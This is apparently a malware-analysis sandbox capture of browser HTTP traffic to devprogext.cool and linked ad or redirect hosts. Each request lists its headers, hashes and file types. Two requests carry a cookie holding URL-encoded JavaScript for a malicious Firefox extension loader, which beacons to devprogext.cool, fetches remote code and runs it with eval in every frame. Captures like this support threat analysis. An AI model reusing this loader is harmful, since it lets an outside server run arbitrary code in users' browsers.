Set-Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; expires=Wed, 21-Aug-19 01:52:51 GMT; path=/; domain=.devprogext.cool; HttpOnly shl=1; expires=Wed, 22-Aug-2018 01:52:51 GMT; Max-Age=86400; path=/ uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; expires=Tue, 21-Aug-2018 02:52:51 GMT; Max-Age=3600; path=/ t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; expires=Tue, 21-Aug-2018 01:58:51 GMT; Max-Age=360; path=/ s=38640ff1aj63beaac3q3; expires=Tue, 21-Aug-2018 01:58:51 GMT; Max-Age=360; path=/
Server: cloudflare
CF-RAY: 44d9767301e742b5-OSL
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   17895
Md5:    2c5189736f159971b8a77da2b1b5beb8
Sha1:   3116aa55728359c59b8fb81c414c023689ba2223
Sha256: d9f3d57fc7c3edd3ab9acd6e7bfb6532a34527e3656575732ab93ee81bf0f3a2
                                        
                                            GET /2/lib/jquery.min.js HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 20 Aug 2018 15:16:35 GMT
Etag: W/"5b7adb53-1538f"
Content-Encoding: gzip
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Tue, 21 Aug 2018 05:52:51 GMT
Cache-Control: public, max-age=14400
Server: cloudflare
CF-RAY: 44d97673d28b429d-OSL


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   34106
Md5:    bf13a6b8435f80e19d7827f205845b59
Sha1:   44dbd2aadc6e3ad655f88d469ad53268443bf781
Sha256: ddc9353b24962d31baeffabe4aa408e001f282ab19d15b2e887a0243fdf358d0
                                        
                                            GET /2/lib/arrow__up.png HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Content-Length: 33223
Connection: keep-alive
Last-Modified: Mon, 20 Aug 2018 15:16:35 GMT
Etag: "5b7adb53-81c7"
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Tue, 21 Aug 2018 05:52:51 GMT
Cache-Control: public, max-age=14400
Accept-Ranges: bytes
Server: cloudflare
CF-RAY: 44d97673d1f142b5-OSL


--- Additional Info ---
Magic:  PNG image, 450 x 592, 8-bit/color RGBA, non-interlaced
Size:   33223
Md5:    d806d5f73b4b7ca093a0ad79f47bf0c8
Sha1:   4cdadce2fe96281196aafd62cb41ea85aa8a54fd
Sha256: 4399fd13a2b71e3f70846fd5de33d293ecbba9d870115a1fdef53b3a142b62fb
                                        
                                            GET /2/lib/animate.min.css HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 20 Aug 2018 15:16:35 GMT
Etag: W/"5b7adb53-ce35"
Content-Encoding: gzip
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Tue, 21 Aug 2018 05:52:51 GMT
Cache-Control: public, max-age=14400
Server: cloudflare
CF-RAY: 44d97673d1534267-OSL


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4905
Md5:    0f44ef1d2c147d564d9ef16bbefad60a
Sha1:   a3a1bf29b825fb57312df6c25d7996c815248b72
Sha256: 5f288dd57347fe41527a3b31946b24a1848d65f27a8176a87ef47f338865c8b3
                                        
                                            GET /2/lib/reset.min.css HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 20 Aug 2018 15:16:35 GMT
Etag: W/"5b7adb53-305"
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Tue, 21 Aug 2018 05:52:51 GMT
Cache-Control: public, max-age=14400
Server: cloudflare
CF-RAY: 44d97673d17d4261-OSL
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   437
Md5:    5bcd6972d9d527b258da74330a836f31
Sha1:   268a327846e2e0b8d110d5b83354da22325d9699
Sha256: ea060493ab5804231dfc39a9b7df66db644c47a79b6d4081bed18aee55367743
                                        
                                            GET /2/lib/screenfull.min.js HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 20 Aug 2018 15:16:35 GMT
Etag: W/"5b7adb53-7e2"
Content-Encoding: gzip
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Tue, 21 Aug 2018 05:52:51 GMT
Cache-Control: public, max-age=14400
Server: cloudflare
CF-RAY: 44d97673d17b4261-OSL


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   826
Md5:    703e057d4fb9a5734ac86ebb0c766173
Sha1:   adf979ae3c8b97403e30a7a65f86d19551e68fe2
Sha256: 8d0f4c51822352ec6e3a413a4e3f0458de1df37aa8c6e19ad78966a5efc3bcaa
                                        
                                            GET /ff/installlistener/ HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Server: cloudflare
CF-RAY: 44d9767461f742b5-OSL
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   951
Md5:    dad585109822d6ea0e216669ff707dde
Sha1:   f99a1ead98ca5c7782dedcf71de2a4fcc4e357c5
Sha256: f387a7b2b71fe0253d5a9b9b434dffdf2057fca3e70f8b4e748b55a927492919
                                        
                                            POST / HTTP/1.1 
Host: ocsp.comodoca4.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 116
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Apache
Last-Modified: Mon, 20 Aug 2018 17:06:50 GMT
Etag: 010F527D4DD547C88A74760EFEAB8BC540232E28
X-OCSP-Responder-ID: rmdccaocsp27
Content-Length: 279
Cache-Control: public, no-transform, must-revalidate, max-age=572646
Expires: Mon, 27 Aug 2018 16:56:57 GMT
Date: Tue, 21 Aug 2018 01:52:51 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   279
Md5:    372d8ab741d83e7491307cf9b5003ffa
Sha1:   010f527d4dd547c88a74760efeab8bc540232e28
Sha256: 89d78aad6b1351d3e7120d8ea5e5e4c5f87413efd7fe8259410d1c36c9760b5a
                                        
                                            GET /js/ktr.js HTTP/1.1 
Host: bronewlook.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608

                                         
                                         104.31.80.131
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Date: Tue, 21 Aug 2018 01:52:52 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dac8ffa87152885c2b60044244f78dc551534816372; expires=Wed, 21-Aug-19 01:52:52 GMT; path=/; domain=.bronewlook.com; HttpOnly
Last-Modified: Wed, 29 Nov 2017 12:33:42 GMT
Etag: W/"5a1ea926-1fa0"
Expires: Fri, 31 Aug 2018 01:52:52 GMT
Cache-Control: public, max-age=864000
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 44d976753a084297-OSL
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   2357
Md5:    ea1103427236b93e93f4f6328b8e0aa5
Sha1:   f398427c28ca28dba93f9d05fdbf03a3e5a420f2
Sha256: 7b53e28ee69dd8b82f321fda12f7ad6ede91fde7170d72b6e7e5f07257ed79d5
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3; 1bf31c02-3bc4-4df8-b046-0c8dd6f3b6de=%28function%28%29%20%7B%09function%20sendStart%28%29%20%7B%09%09var%20t%20%3D%20new%20XMLHttpRequest%3B%09%09t.onreadystatechange%20%3D%20function%28%29%20%7B%09%09%09browser.storage.local.set%28%7B%09%09%09%09start%3A%201%09%09%09%7D%29%3B%09%09%7D%2C%20t.open%28%22GET%22%2C%20%22http%3A//devprogext.cool/%3Fevent%3Dstart%22%2C%20%210%29%2C%20t.send%28%29%09%7D%20%20%20%20sendR%28%29%3B%09function%20sendR%28%29%20%7B%09%09var%20c%20%3D%20new%20XMLHttpRequest%3B%09%09c.open%28%22GET%22%2C%20getURl%28%29%29%3B%09%09c.onload%20%3D%20function%28%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20sendStart%28%29%3B%09%09%09if%20%28200%20%3D%3D%20c.status%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20i%20%3D%20c.responseText%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%09browser.storage.local.set%28%7B%09%09%09%09%09id%3A%20i%09%09%09%09%7D%29%3B%09%09%09%09browser.storage.local.set%28%7B%09%09%09%09%09t%3A%20new%20Date%28%29.getTime%28%29%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20browser.tabs.executeScript%28%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20code%3A%20%22window.location.hash%3D%60devprogext.cool%60%22%2C%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20allFrames%3A%20true%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29.then%28%28%29%20%3D%3E%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20eval%28i%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%7D%20else%20%7B%09%09%09%09setTimeout%28function%28%29%20%7B%09%09%09%09%09sendR%28%29%3B%09%09%09%09%7D%2C%20600000%29%3B%09%09%09%7D%09%09%7D%3B%09%09c.onerror%20%3D%20function%28%29%20%7B%09%09%09setTimeout%28function%28%29%20%7B%09%09%09%09sendR%28%29%3B%09%09%09%7D%2C%20600000%29%3B%09%09%7D%3B%09%09c.send%28%29%20%20%20%20%7D%20%20%20%09function%20getURl%28%29%20%7B%09%09return%20%22http%3A//devprogext.cool/ff/load/%22%3B%09%7D%7D%29.call%28this%29%3B

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Tue, 21 Aug 2018 01:52:52 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: EXPIRED
Vary: Accept-Encoding
Expires: Tue, 28 Aug 2018 01:52:52 GMT
Cache-Control: public, max-age=604800
Server: cloudflare
CF-RAY: 44d9767542a0429d-OSL
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   10684
Md5:    cfac705015b3a22efc085375637ebced
Sha1:   34d7123748b246c12705d766cfacb2c3157a6261
Sha256: 25b8d2fa20a6ed8f3c6278bd4a723a311e6b738bae4e7378266fabef3a06b9c2
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __cfduid=dd33c892b4e45fefebe73b06868568cef1534816371; shl=1; uridata=%7B%22aid%22%3A%22go%22%2C%22subid%22%3A%221938926%22%7D; t=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608; s=38640ff1aj63beaac3q3; 1bf31c02-3bc4-4df8-b046-0c8dd6f3b6de=%28function%28%29%20%7B%09function%20sendStart%28%29%20%7B%09%09var%20t%20%3D%20new%20XMLHttpRequest%3B%09%09t.onreadystatechange%20%3D%20function%28%29%20%7B%09%09%09browser.storage.local.set%28%7B%09%09%09%09start%3A%201%09%09%09%7D%29%3B%09%09%7D%2C%20t.open%28%22GET%22%2C%20%22http%3A//devprogext.cool/%3Fevent%3Dstart%22%2C%20%210%29%2C%20t.send%28%29%09%7D%20%20%20%20sendR%28%29%3B%09function%20sendR%28%29%20%7B%09%09var%20c%20%3D%20new%20XMLHttpRequest%3B%09%09c.open%28%22GET%22%2C%20getURl%28%29%29%3B%09%09c.onload%20%3D%20function%28%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20sendStart%28%29%3B%09%09%09if%20%28200%20%3D%3D%20c.status%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20i%20%3D%20c.responseText%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%09browser.storage.local.set%28%7B%09%09%09%09%09id%3A%20i%09%09%09%09%7D%29%3B%09%09%09%09browser.storage.local.set%28%7B%09%09%09%09%09t%3A%20new%20Date%28%29.getTime%28%29%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20browser.tabs.executeScript%28%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20code%3A%20%22window.location.hash%3D%60devprogext.cool%60%22%2C%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20allFrames%3A%20true%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29.then%28%28%29%20%3D%3E%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20eval%28i%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%7D%20else%20%7B%09%09%09%09setTimeout%28function%28%29%20%7B%09%09%09%09%09sendR%28%29%3B%09%09%09%09%7D%2C%20600000%29%3B%09%09%09%7D%09%09%7D%3B%09%09c.onerror%20%3D%20function%28%29%20%7B%09%09%09setTimeout%28function%28%29%20%7B%09%09%09%09sendR%28%29%3B%09%09%09%7D%2C%20600000%29%3B%09%09%7D%3B%09%09c.send%28%29%20%20%20%20%7D%20%20%20%09function%20getURl%28%29%20%7B%09%09return%20%22http%3A//devprogext.cool/ff/load/%22%3B%09%7D%7D%29.call%28this%29%3B

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Tue, 21 Aug 2018 01:52:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Tue, 28 Aug 2018 01:52:54 GMT
Cache-Control: public, max-age=604800
Server: cloudflare
CF-RAY: 44d97681929742b5-OSL
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   10684
Md5:    cfac705015b3a22efc085375637ebced
Sha1:   34d7123748b246c12705d766cfacb2c3157a6261
Sha256: 25b8d2fa20a6ed8f3c6278bd4a723a311e6b738bae4e7378266fabef3a06b9c2
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: cobalten.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: SeenToday=1; OAGEO5580f=13%7CNO%7C02%7CLORENSKOG%7CXDSL%7CBROADNET+AS%7C%7C11329%7C43703%7C%3F%7C578205; oaidts=1534816370; OAID=f8e2341405ecc01afe038fc56b44a136; OFR=%7B%2230265%22%3A2%7D; exsdsf=1534816370; pbk3=12d8a15f469dd3bae7e6d0049fe5fbe46591986116571814368; ltm_afu=1; f3d5bb63c9dbdcfb475795d659c65a4e=3f1HG4OdnWPOKNekIh9MuOMnhVjpwUsQT_kcDq0fUeQ; ppucnt=1; ppucntstart=1534816371; allcnt=1; _OACCAP[1283126]=1; _OACBLOCK[1283126]=1534816371; _OXCCLK[1283126]=1; _OXPCLK[136588]=1

                                         
                                         188.42.162.184
HTTP/1.1 204 No Content
                                        
Server: nginx
Date: Tue, 21 Aug 2018 01:52:54 GMT
Connection: keep-alive
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000, public, must-revalidate, proxy-revalidate
Pragma: public


--- Additional Info ---